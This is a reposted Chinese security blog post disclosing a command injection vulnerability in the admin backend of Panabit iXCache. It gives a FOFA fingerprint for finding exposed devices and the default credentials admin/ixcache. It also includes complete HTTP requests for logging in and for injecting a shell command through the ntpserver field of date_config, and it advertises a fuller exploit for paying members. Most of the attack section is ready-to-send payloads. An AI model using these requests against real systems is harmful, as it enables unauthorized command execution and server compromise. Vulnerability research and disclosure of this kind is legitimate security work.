烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

admin 2024年10月13日15:59:08评论48 views字数 1656阅读5分31秒阅读模式

# 点击蓝字,关注我们;设为星标,永不迷路#

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任

一、漏洞说明

panabit缓存加速产品是一款基于派网公司自研的操作系统(PanaOS)上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点,可缓存丰富的资源,目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式,满足不同级别的用户需求。panabit iXCache系统date_config存在命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。

烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

二、FOFA 指纹

fofa:title="iXCache"

三、漏洞复现

弱口令admin-ixcache登录,请求为:

POST /login/userverify.cgi HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

username=admin&password=ixcache

登录成功后,可进入后台:

烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

通过漏洞执行ls命令,得到回显(每次发包需要在登录处重新获取一次cookie)

POST /cgi-bin/Maintain/date_config HTTP/1.1
Host: {{Hostname}}
Cookie: pauser_1626709857_644740=paonline_admin_48217_16289319551;Path=/;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

ntpserver=0.0.0.0;ls&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1

烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

完善的 EXP 和漏洞讲解请前往知识星球获取:

烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

【预告】隐侠专业社群“隐侠安全客栈1.0”已在内测中,知识星球是客栈 1.0 的知识区,购买知识星球将邀请入住客栈,最准时的安全资讯,最精彩的安全沙龙,等你加入!!!

烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

关注东方隐侠安全团队 为安全界刮起一股侠客风

        东方隐侠安全团队,一支专业的网络安全团队,将持续为您分享红蓝对抗、病毒研究、安全运营、应急响应等网络安全知识,提供一流网络安全服务,敬请关注!

烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

公众号|东方隐侠安全实验室

原文始发于微信公众号(东方隐侠安全实验室):烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日15:59:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   烽火狼烟|Panabit iXCache date_config 后台命令执行漏洞https://cn-sec.com/archives/1898460.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息